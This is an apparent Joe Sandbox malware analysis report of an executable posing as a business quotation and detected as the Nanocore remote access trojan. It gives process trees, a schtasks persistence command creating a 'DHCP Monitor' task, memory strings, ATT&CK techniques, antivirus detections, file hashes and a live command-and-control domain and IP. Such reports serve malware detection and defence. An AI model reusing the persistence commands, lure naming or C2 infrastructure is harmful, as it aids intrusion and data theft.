Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process created: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe 'C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp21A1.tmp'	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior

Source: RegAsm.exe, 00000004.00000002.508158113.000000000337F000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.507497314.0000000001E50000.00000002.00000001.sdmp, RegAsm.exe, 00000004.00000002.507030206.0000000001B70000.00000002.00000001.sdmp, Quotation ATB-PR28500KINH.exe, 00000005.00000002.507778484.0000000001AA0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.507497314.0000000001E50000.00000002.00000001.sdmp, RegAsm.exe, 00000004.00000002.507030206.0000000001B70000.00000002.00000001.sdmp, Quotation ATB-PR28500KINH.exe, 00000005.00000002.507778484.0000000001AA0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.507497314.0000000001E50000.00000002.00000001.sdmp, RegAsm.exe, 00000004.00000002.507030206.0000000001B70000.00000002.00000001.sdmp, Quotation ATB-PR28500KINH.exe, 00000005.00000002.507778484.0000000001AA0000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: RegAsm.exe, 00000004.00000002.508026222.00000000032FD000.00000004.00000001.sdmp	Binary or memory string: Program ManagerD$
Source: RegAsm.exe, 00000004.00000002.508158113.000000000337F000.00000004.00000001.sdmp	Binary or memory string: Program Managerl
Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.507497314.0000000001E50000.00000002.00000001.sdmp, RegAsm.exe, 00000004.00000002.507030206.0000000001B70000.00000002.00000001.sdmp, Quotation ATB-PR28500KINH.exe, 00000005.00000002.507778484.0000000001AA0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.507497314.0000000001E50000.00000002.00000001.sdmp, RegAsm.exe, 00000004.00000002.507030206.0000000001B70000.00000002.00000001.sdmp, Quotation ATB-PR28500KINH.exe, 00000005.00000002.507778484.0000000001AA0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Queries volume information: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Queries volume information: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000012.00000002.315767298.0000000002F81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.512937029.00000000059E2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.511416569.0000000003FF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.511598900.0000000004299000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.514616448.00000000068A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.504689843.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.517841818.0000000005A82000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.511212576.0000000004381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.513612076.0000000005D3C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.315860307.0000000003F89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.506085283.0000000001233000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.315053355.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.507695159.0000000003291000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6916, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6620, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6988, type: MEMORY
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.68a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.68a0000.4.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: Quotation ATB-PR28500KINH.exe, 00000000.00000002.512937029.00000000059E2000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 00000004.00000002.511598900.0000000004299000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 00000004.00000002.511598900.0000000004299000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: Quotation ATB-PR28500KINH.exe, 00000005.00000002.511416569.0000000003FF1000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 00000012.00000002.315767298.0000000002F81000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegAsm.exe, 00000012.00000002.315767298.0000000002F81000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000012.00000002.315767298.0000000002F81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.512937029.00000000059E2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.511416569.0000000003FF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.511598900.0000000004299000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.514616448.00000000068A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.504689843.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.517841818.0000000005A82000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.511212576.0000000004381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.513612076.0000000005D3C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.315860307.0000000003F89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.506085283.0000000001233000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.315053355.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.507695159.0000000003291000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6916, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6620, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation ATB-PR28500KINH.exe PID: 6988, type: MEMORY
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.68a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.68a0000.4.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Startup Items1	Startup Items1	Masquerading11	Input Capture11	Security Software Discovery111	Remote Services	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Scheduled Task/Job1	Process Injection212	Virtualization/Sandbox Evasion3	LSASS Memory	Virtualization/Sandbox Evasion3	Remote Desktop Protocol	Archive Collected Data11	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Registry Run Keys / Startup Folder12	Scheduled Task/Job1	Disable or Modify Tools1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	DLL Side-Loading1	Registry Run Keys / Startup Folder12	Process Injection212	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	DLL Side-Loading1	Deobfuscate/Decode Files or Information1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Files and Directories1	Cached Domain Credentials	System Information Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing13	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	DLL Side-Loading1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
Quotation ATB-PR28500KINH.exe	27%	ReversingLabs	ByteCode-MSIL.Trojan.Wacatac
Quotation ATB-PR28500KINH.exe	100%	Avira	TR/AD.Nanocore.bbyez
Quotation ATB-PR28500KINH.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe	100%	Avira	TR/AD.Nanocore.bbyez
C:\Users\user\AppData\Roaming\5thncv	100%	Avira	TR/AD.Nanocore.bbyez
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\5thncv	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\5thncv	27%	ReversingLabs	ByteCode-MSIL.Trojan.Wacatac

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.2.Quotation ATB-PR28500KINH.exe.5a80000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
18.2.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
4.2.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
0.2.Quotation ATB-PR28500KINH.exe.59e0000.1.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
4.2.RegAsm.exe.68a0000.4.unpack	100%	Avira	TR/NanoCore.fadte	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
kengeorge.zapto.org	194.5.97.9	true	false		unknown
g.msn.com	unknown	unknown	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
194.5.97.9	unknown	Netherlands		208476	DANILENKODE	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	321077
Start date:	20.11.2020
Start time:	10:50:48
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Quotation ATB-PR28500KINH.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.adwa.evad.winEXE@14/8@21/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.1% (good quality ratio 0%) Quality average: 12.7% Quality standard deviation: 9%
HCA Information:	Successful, ratio: 100% Number of executed functions: 61 Number of non-executed functions: 3
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 52.255.188.83, 23.210.248.85, 51.104.139.180, 51.103.5.159, 8.241.9.254, 8.253.204.120, 8.248.119.254, 8.248.113.254, 8.241.11.254, 8.241.11.126, 8.248.125.254, 8.248.117.254, 67.26.137.254, 52.155.217.156, 20.54.26.129, 52.142.114.176, 95.101.22.125, 95.101.22.134, 51.11.168.160 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, g-msn-com-nsatc.trafficmanager.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, skypedataprdcolwus15.cloudapp.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/321077/sample/Quotation ATB-PR28500KINH.exe

Simulations

Behavior and APIs

Time	Type	Description
10:51:51	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe
10:51:57	Task Scheduler	Run new task: DHCP Monitor path: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" s>$(Arg0)
10:51:57	API Interceptor	917x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
kengeorge.zapto.org	Quotation ATB-PR28500KINH.exe	Get hash	malicious	Browse	185.140.53.139

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DANILENKODE	19112020778IMG78487784.exe	Get hash	malicious	Browse	194.5.97.249
	PaymentConformation.exe	Get hash	malicious	Browse	194.5.97.202
	bGtm3bQKUj.exe	Get hash	malicious	Browse	194.5.98.122
	IMAGE-18112020.exe	Get hash	malicious	Browse	194.5.97.17
	Covid-19 relief.exe	Get hash	malicious	Browse	194.5.97.21
	tax-relief.exe	Get hash	malicious	Browse	194.5.97.166
	Ref-BID PRICE.exe	Get hash	malicious	Browse	194.5.98.252
	1ttmgYD97B.exe	Get hash	malicious	Browse	194.5.99.163
	2mtUEXin7W.exe	Get hash	malicious	Browse	194.5.99.163
	wk59hOo880.exe	Get hash	malicious	Browse	194.5.99.163
	BCVaSYrgmG.exe	Get hash	malicious	Browse	194.5.99.163
	30203490666.exe	Get hash	malicious	Browse	194.5.98.199
	InSppuoN2s.exe	Get hash	malicious	Browse	194.5.98.196
	Av01vC7kS1.exe	Get hash	malicious	Browse	194.5.97.155
	yb1rlaFJuO.exe	Get hash	malicious	Browse	194.5.99.163
	1MwYrZqjEy.exe	Get hash	malicious	Browse	194.5.99.163
	IRS-RELIEF.exe	Get hash	malicious	Browse	194.5.97.21
	Jvdivmn_Signed_.exe	Get hash	malicious	Browse	194.5.97.38
	myupsfile.exe	Get hash	malicious	Browse	194.5.97.38
	dO50wcBKmS.exe	Get hash	malicious	Browse	194.5.97.155

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Temp\tmp21A1.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1319
Entropy (8bit):	5.134254141338449
Encrypted:	false
SSDEEP:	24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0mxz5xtn:cbk4oL600QydbQxIYODOLedq3Zxz5j
MD5:	48EF7FA9033389AD7929D7A6B9D10298
SHA1:	9DB6CB7325C8BDF66A15F7B5F34703709A45AEB6
SHA-256:	0C1B5F67EEB276D1D4205B138CE32BC6149924E02281A2DB8E4623A700E88F15
SHA-512:	AC8BD104ECBACC9BCCCE9E087F67E5B18072D59367CCD31D4E66132B6BAAEA520CBA5B9B59464483D86ABF74826B382C402F12E9A586C99BDA8C78A0DE33944E
Malicious:	true
Reputation:	moderate, very likely benign file
